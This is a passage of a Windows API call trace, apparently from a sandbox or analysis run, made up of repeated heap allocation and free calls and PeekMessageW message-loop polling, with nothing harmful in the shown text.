hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.642] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.642] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.642] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.642] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.642] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.642] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.642] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b18 [0257.642] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.642] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.642] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.642] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.643] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.643] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.643] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b28 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.643] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.643] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.643] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.643] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.643] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.643] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.643] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.643] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.643] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.643] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.643] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.643] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.643] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.643] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.644] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.644] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.644] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.644] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.644] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.644] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.644] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.644] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.644] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.644] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.644] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.644] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.644] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.644] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.644] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.645] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.646] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.647] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.648] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.649] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW 